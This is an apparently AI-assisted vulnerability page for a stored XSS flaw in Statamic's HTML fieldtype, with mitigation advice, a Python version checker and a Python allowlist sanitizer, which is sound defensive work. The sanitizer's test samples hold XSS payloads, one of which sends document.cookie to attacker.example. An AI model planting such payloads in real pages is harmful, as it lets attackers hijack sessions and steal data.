CVE-2026-27196
Stored XSS in Statamic HTML Fields Allows Privilege Escalation
Publication date: 2026-02-21
Last updated on: 2026-03-30
Assigner: GitHub, Inc.
Description
CVSS Scores
EPSS Scores
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| statamic | statamic | to 5.73.9 (exc) |
| statamic | statamic | From 6.0.0 (inc) to 6.3.2 (exc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-79 | The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
AI Powered Q&A
Can you explain this vulnerability to me?
This vulnerability is a stored cross-site scripting (XSS) issue in the Statamic content management system (CMS), in its HTML fieldtype. An authenticated user who holds the permission to manage fields can store HTML containing JavaScript in that field. When a higher-privileged user later views the content, the script runs in that user's browser with that user's session, which is why the advisory describes it as privilege escalation: the attacker needs only field-management rights, but the injected script acts with the victim's.
The vulnerability exists in Statamic versions 5.73.8 and below, and in 6.0.0-alpha.1 through 6.3.1. It is fixed in 5.73.9 and 6.3.2, which add HTML sanitization with the DOMPurify library so that the stored HTML is cleaned before it is rendered.
How can this vulnerability impact me?
This vulnerability can allow attackers with field management permissions to inject malicious JavaScript code that executes in the browsers of higher-privileged users. This can lead to unauthorized actions such as session hijacking, data theft, or performing actions on behalf of the victim user.
Because the attack is stored, the malicious code persists in the system and triggers whenever the affected content is viewed, increasing the risk and potential impact.
The vulnerability has a high severity score (CVSS 8.1) indicating significant confidentiality and integrity impacts, though it does not affect availability.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
I don't know
How can this vulnerability be detected on my network or system? Can you suggest some commands?
I don't know
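As an added example that is not part of this page's answer and not Statamic's own tooling: one practical check is to read the statamic/cms version pinned in the site's composer.lock and compare it with the affected ranges listed above (below 5.73.9 on the 5.x line, below 6.3.2 on the 6.x line, pre-releases included). The composer.lock excerpt embedded below is constructed for illustration; the version-comparison rules are an assumption of the example and cover the alpha/beta/rc suffixes Composer uses, not every possible version string.

```python
"""Flag a statamic/cms version that falls inside the affected ranges.

Added example written for this page; it is not part of the advisory or of
Statamic. The composer.lock content below is constructed for illustration.
"""
import json
import re

# Fixed releases named in the advisory: everything below 5.73.9 on the 5.x
# line and everything below 6.3.2 on the 6.x line (6.0.0-alpha.1 included).
FIXED_5X = "5.73.9"
FIXED_6X = "6.3.2"

# Constructed composer.lock excerpt, trimmed to the fields the check uses.
SAMPLE_COMPOSER_LOCK = json.dumps({
    "packages": [
        {"name": "laravel/framework", "version": "v11.30.0"},
        {"name": "statamic/cms", "version": "v6.3.1"},
    ],
    "packages-dev": [],
})

_PRERELEASE_RANK = {"alpha": 0, "beta": 1, "rc": 2}
_FINAL_RANK = 3  # a final release sorts above any pre-release of the same number


def parse_version(text):
    """Turn 'v6.0.0-alpha.1' into a tuple that compares correctly.

    Handles the Composer-style leading 'v' and alpha/beta/rc suffixes, so that
    6.0.0-alpha.1 < 6.0.0 < 6.3.1 < 6.3.2 holds under plain tuple comparison.
    Branch aliases such as 'dev-main' are rejected rather than guessed at.
    """
    m = re.fullmatch(r"v?(\d+)\.(\d+)\.(\d+)(?:-([A-Za-z]+)\.?(\d+)?)?", text.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    core = tuple(int(part) for part in m.group(1, 2, 3))
    if m.group(4) is None:
        return core + (_FINAL_RANK, 0)
    rank = _PRERELEASE_RANK.get(m.group(4).lower(), -1)  # unknown tags sort lowest
    return core + (rank, int(m.group(5) or 0))


def is_affected(version):
    """True when the version is inside one of the advisory's affected ranges."""
    v = parse_version(version)
    major = v[0]
    if major < 6:
        return v < parse_version(FIXED_5X)
    if major == 6:
        return v < parse_version(FIXED_6X)
    return False  # 7.x and later are outside the ranges the advisory lists


def find_statamic_version(lock_json):
    """Return the statamic/cms version pinned in a composer.lock, or None."""
    lock = json.loads(lock_json)
    for pkg in lock.get("packages", []) + lock.get("packages-dev", []):
        if pkg.get("name") == "statamic/cms":
            return pkg["version"]
    return None


def check_lock(lock_json):
    """Return (version, affected) for the statamic/cms entry in a lock file."""
    version = find_statamic_version(lock_json)
    if version is None:
        return None, False
    return version, is_affected(version)


if __name__ == "__main__":
    import sys
    # With a path argument, read a real composer.lock; otherwise use the sample.
    data = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_COMPOSER_LOCK
    version, affected = check_lock(data)
    if version is None:
        print("statamic/cms not found in lock file")
    else:
        print(f"statamic/cms {version}: {'AFFECTED' if affected else 'not affected'}")
```

Run it as `python check_statamic.py /path/to/site/composer.lock`; on a host with Composer available, `composer show statamic/cms` run in the project directory prints the same installed version and can be fed to `is_affected` directly. The lock file is the authoritative source because it records what is actually installed, not the constraint in composer.json.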
What immediate steps should I take to mitigate this vulnerability?
To mitigate this issue in Statamic 5.73.8 and below, or 6.0.0-alpha.1 through 6.3.1, upgrade to 5.73.9 or 6.3.2 respectively, where it is fixed.
The fix sanitizes HTML fieldtype content with the DOMPurify library so that injected script never reaches the viewing user's browser.
Ensure that sanitization is enabled in the HTML fieldtype configuration (it is the default setting) so HTML input is cleaned automatically before rendering. Until the upgrade is in place, limit which roles hold the field-management permission, since that permission is the only precondition the attacker needs, and review existing HTML field content for unexpected <script> tags, event-handler attributes or javascript: URLs.
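The following is an added illustration written for this page, in Python; it is neither Statamic's code nor DOMPurify, and it serves both the fix description above (sanitizing stored HTML before it is rendered) and the mitigation steps. It shows the class of defence the patched releases introduce, an allowlist sanitizer applied to the kinds of payload a field manager could store: inline scripts, event-handler attributes and javascript: URLs, including the whitespace-in-scheme trick that a naive prefix check misses. The tag and attribute allowlists are assumptions chosen for the example, and the stored field contents are constructed.

```python
"""Allowlist HTML sanitizer illustrating the class of fix described above.

Added example written for this page in Python; it is neither Statamic's code
nor DOMPurify. The allowlists are assumptions chosen for the illustration,
and the stored field contents below are constructed.
"""
import re
from html import escape
from html.parser import HTMLParser

ALLOWED_TAGS = {"p", "br", "a", "b", "i", "em", "strong", "ul", "ol", "li",
                "h1", "h2", "h3", "img"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt"}}
URL_ATTRS = {"href", "src"}
SAFE_SCHEMES = {"http", "https", "mailto"}
VOID_TAGS = {"br", "img"}
# Elements whose content must go too, not just the tags around it.
DROP_CONTENT = {"script", "style", "iframe", "object", "embed", "svg", "math"}


def safe_url(value):
    """Keep http(s), mailto and relative URLs; reject javascript:, data:, etc.

    Whitespace and control characters are stripped before the check because
    browsers ignore them inside a scheme ("java<TAB>script:" still executes).
    """
    norm = re.sub(r"[\s\x00-\x1f\x7f]", "", value).lower()
    if ":" not in norm:
        return True  # relative URL such as /docs or #anchor
    return norm.split(":", 1)[0] in SAFE_SCHEMES


class AllowlistSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.drop_depth = 0  # > 0 while inside an element from DROP_CONTENT

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT:
            self.drop_depth += 1
            return
        if self.drop_depth or tag not in ALLOWED_TAGS:
            return  # unknown tags are removed; their text is kept
        kept = []
        for name, value in attrs:
            value = value or ""
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue  # drops every on* handler and anything else unlisted
            if name in URL_ATTRS and not safe_url(value):
                continue
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT:
            self.drop_depth = max(0, self.drop_depth - 1)
            return
        if self.drop_depth or tag not in ALLOWED_TAGS or tag in VOID_TAGS:
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.drop_depth:
            self.out.append(escape(data, quote=False))
    # Comments, doctypes and processing instructions are dropped by default:
    # HTMLParser only emits what the handlers above append.


def sanitize(html):
    parser = AllowlistSanitizer()
    parser.feed(html)
    parser.close()
    return "".join(parser.out)


# Constructed examples of what a field manager could store in an HTML field.
STORED_SAMPLES = {
    "benign": '<p>Notes for <a href="https://example.com/?a=1&amp;b=2">v6</a></p>',
    "script": '<p>Hi</p><script>new Image().src="https://attacker.example/?c="+document.cookie</script>',
    "event handler": '<img src="x" onerror="alert(document.cookie)">',
    "javascript url": '<a href=" JaVaScRiPt:alert(1)">click</a>',
    "unknown tag": '<div><span>plain text</span></div>',
}

if __name__ == "__main__":
    for label, html in STORED_SAMPLES.items():
        print(f"{label:>14}: {sanitize(html)}")
```

Running it on the constructed samples shows the script element, the onerror handler and the javascript: href removed while ordinary markup and safe links survive unchanged. The patched Statamic releases do the equivalent with DOMPurify, which carries a far more complete allowlist and handles browser parsing quirks this toy does not; the point of the example is the shape of the check (allowlist tags, allowlist attributes, normalise then allowlist URL schemes), not to replace the library.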